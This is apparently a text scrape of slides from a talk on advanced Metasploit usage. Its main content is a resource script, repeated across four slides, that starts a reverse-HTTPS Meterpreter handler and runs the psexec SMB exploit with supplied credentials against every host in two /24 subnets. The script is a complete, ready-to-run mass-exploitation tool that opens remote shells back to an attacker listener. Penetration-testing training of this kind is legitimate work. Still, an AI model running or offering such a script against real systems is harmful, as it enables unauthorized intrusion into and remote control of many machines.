More Related Content
Similar to Metasploit magic the dark coners of the framework
Similar to Metasploit magic the dark coners of the framework (20)
Metasploit magic the dark coners of the framework
- 12. resource files
line by line script
can understand ruby
for meterpreter sessions now!
./msfconsole -r psexec.rc
msf> resource psexec.rc
- 13. use multi/handler
setg PAYLOAD windows/meterpreter/reverse_https
setg LHOST 192.168.1.100
setg LPORT 443
set ExitOnSession false
exploit -j -z
!
use windows/smb/psexec
set SMBUser AdminBob
set SMBPass ThisPasswordSucks
set SMBDomain .
set DisablePayloadHandler true
!
<ruby>
!
require 'rex/socket/range_walker'
!
rhosts = '10.10.10.0/24,10.10.14.0/24'
!
iplist = Rex::Socket::RangeWalker.new(rhosts)
iplist.each do |rhost|
self.run_single("set RHOST #{rhost}")
self.run_single("exploit -j -z")
end
</ruby>
!
psexec scanner
- 14. use multi/handler
setg PAYLOAD windows/meterpreter/reverse_https
setg LHOST 192.168.1.100
setg LPORT 443
set ExitOnSession false
exploit -j -z
!
use windows/smb/psexec
set SMBUser AdminBob
set SMBPass ThisPasswordSucks
set SMBDomain .
set DisablePayloadHandler true
!
<ruby>
!
require 'rex/socket/range_walker'
!
rhosts = '10.10.10.0/24,10.10.14.0/24'
!
iplist = Rex::Socket::RangeWalker.new(rhosts)
iplist.each do |rhost|
self.run_single("set RHOST #{rhost}")
self.run_single("exploit -j -z")
end
</ruby>
!
psexec scanner
- 15. use multi/handler
setg PAYLOAD windows/meterpreter/reverse_https
setg LHOST 192.168.1.100
setg LPORT 443
set ExitOnSession false
exploit -j -z
!
use windows/smb/psexec
set SMBUser AdminBob
set SMBPass ThisPasswordSucks
set SMBDomain .
set DisablePayloadHandler true
!
<ruby>
!
require 'rex/socket/range_walker'
!
rhosts = '10.10.10.0/24,10.10.14.0/24'
!
iplist = Rex::Socket::RangeWalker.new(rhosts)
iplist.each do |rhost|
self.run_single("set RHOST #{rhost}")
self.run_single("exploit -j -z")
end
</ruby>
!
psexec scanner
- 16. use multi/handler
setg PAYLOAD windows/meterpreter/reverse_https
setg LHOST 192.168.1.100
setg LPORT 443
set ExitOnSession false
exploit -j -z
!
use windows/smb/psexec
set SMBUser AdminBob
set SMBPass ThisPasswordSucks
set SMBDomain .
set DisablePayloadHandler true
!
<ruby>
!
require 'rex/socket/range_walker'
!
rhosts = '10.10.10.0/24,10.10.14.0/24'
!
iplist = Rex::Socket::RangeWalker.new(rhosts)
iplist.each do |rhost|
self.run_single("set RHOST #{rhost}")
self.run_single("exploit -j -z")
end
</ruby>
!
psexec scanner